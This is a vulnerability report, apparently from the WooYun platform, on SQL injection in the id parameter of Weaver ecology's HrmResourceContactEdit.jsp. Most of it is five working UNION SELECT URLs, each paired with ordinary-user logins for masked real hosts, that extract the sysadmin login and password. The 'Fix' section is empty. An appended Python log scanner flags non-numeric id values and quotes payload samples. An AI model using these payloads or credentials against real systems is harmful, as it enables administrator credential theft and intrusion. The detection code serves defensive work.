
SQL injection in all versions of the Weaver (泛微) ecology system (official website as the example), part 2

2016-07-02 15:55

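Injection point: /hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29&isView=1

The injectable parameter is id.

Login as an ordinary user is required.

Case 1:

Tested on the official website after logging in with a mobile phone number. After logging in, visit: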

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1




Because the versions differ, the number of columns differs, but the injection point is the same.

Case 2: http://**.**.**.**:812/login/Login.jsp?logintype=1

程凯/111111. After logging in, visit:

http://**.**.**.**:812/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1




Case 3: http://**.**.**.**/login/Login.jsp?logintype=1

wangp/111111. After logging in, visit:

http://**.**.**.**/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=29%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1




Case 4: http://**.**.**.**:18881/login/login.jsp

guobg/1. The column count here is 92.

After logging in, visit:

http://**.**.**.**:18881/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=88%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1




Case 5: **.**.**.**:8080/login/Login.jsp?logintype=1

杨先坤/111. The column count is 105.

After logging in, visit: **.**.**.**:8080/hrm/resource/HrmResourceContactEdit.jsp?isfromtab=true&id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,loginid,11,12,13,14,password,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105%20from%20HrmResourceManager%20where%20loginid=%27sysadmin%27&isView=1






Tested versions include: 8.100.0531+KB81001511, 7.100.0331, 5.000.0327+KB50001107, 4.100.0919
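
As an added example (not part of the original report): a log check for the requests shown in the cases above, flagging any request to HrmResourceContactEdit.jsp whose id parameter is not a plain integer. The access-log layout, the 10-digit bound and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path from the report, compared case-insensitively (assumption about the server).
TARGET_PATH = "/hrm/resource/hrmresourcecontactedit.jsp"
# Assumed access-log layout: common/combined format with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    '10.0.0.5 - - [02/Jul/2016:15:50:01 +0800] "GET /hrm/resource/HrmResourceContactEdit.jsp'
    '?isfromtab=true&id=29&isView=1 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [02/Jul/2016:15:51:12 +0800] "GET /hrm/resource/HrmResourceContactEdit.jsp'
    '?isfromtab=true&id=29%20and%201=2%20union%20select%201,2&isView=1 HTTP/1.1" 200 5300',
    '10.0.0.5 - - [02/Jul/2016:15:52:40 +0800] "GET /login/Login.jsp?logintype=1 HTTP/1.1" 200 900',
    '10.0.0.9 - - [02/Jul/2016:15:53:03 +0800] "GET /hrm/resource/hrmresourcecontactedit.jsp'
    '?id=88%27 HTTP/1.1" 500 0',
]

def is_plain_id(value):
    """A legitimate record id is a short run of ASCII digits and nothing else."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

def scan(lines):
    """Return (line_number, decoded id value) for each flagged request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if url.path.lower() != TARGET_PATH:
            continue
        # parse_qs percent-decodes, so %20 and %27 payloads are compared decoded;
        # every repeated id parameter is checked, not only the first.
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("id", []):
            if not is_plain_id(value):
                hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-numeric id {value!r}")
```

The same integer-only check, applied server-side before id reaches the query, or a parameterized query, closes the injection point described here.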

Proof of vulnerability:

Fix:

Source: www.wooyun.org/bugs/wooyun-2016-0191882
